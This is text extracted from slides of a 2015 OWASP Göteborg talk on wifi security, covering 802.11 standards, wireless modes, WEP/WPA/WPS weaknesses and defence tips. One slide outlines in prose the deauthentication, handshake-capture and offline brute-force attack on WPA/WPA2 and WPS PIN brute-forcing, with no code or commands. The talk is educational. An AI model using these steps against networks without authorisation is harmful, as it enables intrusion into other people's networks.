Hands-onwith wifi securityOWASPGöteborgSecurity Tapas
2015-10-20AndersRosdahl
#whoami
Avarage security enthusiastNobleedingedge research,nowall of fames,nocve'sActually,this isme...
@rosdahl
Agenda
Wifi overview
Authentication andencryption
Attacks
Defence
Demo/lab
Wifi overview
Accesspointscontinuouslysendbeacons toannouncethemselvesClients continouslyprobe foraccesspointsAuthenticationAssociation
Bands,channels andfrequencies
802.11 Releaseyear Frequency(GHz)
Maxdatatransferrate(Mbit/s)
Bandwidth(MHz)
a 1999 5/(3.7) 54 20
b 1999 2.4 11 22
g 2003 2.4 54 20
n 2009 2.4/572/150
(perMIMOstream)
20/40
ac 2013 596/200/433/866(perMIMOstream)
20/40/80/160
there’s more...
Wireless Modes
Each wireless device/inteface can beinone of thefollowingmodes.Definitionsvary.
Station– also referred toasClientmodeorManaged modeMaster– also referred toasAccessPointorInfrastructuremodeAdhoc– formesh wifi networksMonitor – also referred toasRFMON(RadioFrequencyMONitor).Usedtosilently listentowifi traffic.Aninterfaceinthis modecan capturetraffic without connecting toany network.
Notallcombinationof wifi cards/drivers/OSsupportallmodes..
Authentication andencryption
• BasedontheRC4streamcipher,whichiseffectivelybrokenWEP
• WPA – intermediatesolutionwhilewaitingforWPA2,whichwouldfixallthatwasbrokenwithWEP.Designedbycrytographers.
• PSKorasymmetrickeypairs/certificates• TKIP-RC4(WPA)/CCMP-AES(WPA2)
WPA/WPA2
• ProvidesWPA/WPA2passwordtoclientrequiringonlyaPINcode• Twomodes:• Push-Button-Connect• 4/8digitPINcode
WPS
Attacks
WPA/WPA21. Deauthenticate connected client(s)with traffic injection2. Capture re-authenticationhandshake3. Offline word-listorrule-based brute forceattackonrecorded handshake
WPSBrute forceWPSPIN.In2012several deficiencies inWPSwere disclosed.E.g.onlymax11kvs10Mtries isneeded since APacks/nacks first 4digits.WPSbackoff/timeouttimeoutpreventsbruteforcing.Was notubiquitous 2012.
WEPRC4...Offline brute forceattacksimilar toWPAabove
Defence – hotsecurity tipsforhotspots
Use longandstrongWPA2passwords!Disable WPSonyour routerDon’t useWEP– obviously...Use VPNwhen connected topublicaccesspoints – anyone canlistenBecareful about auto-connectfeaturesof devices toavoidconnecting torougeaccesspoints
Demo/lab
Alfacards forloan!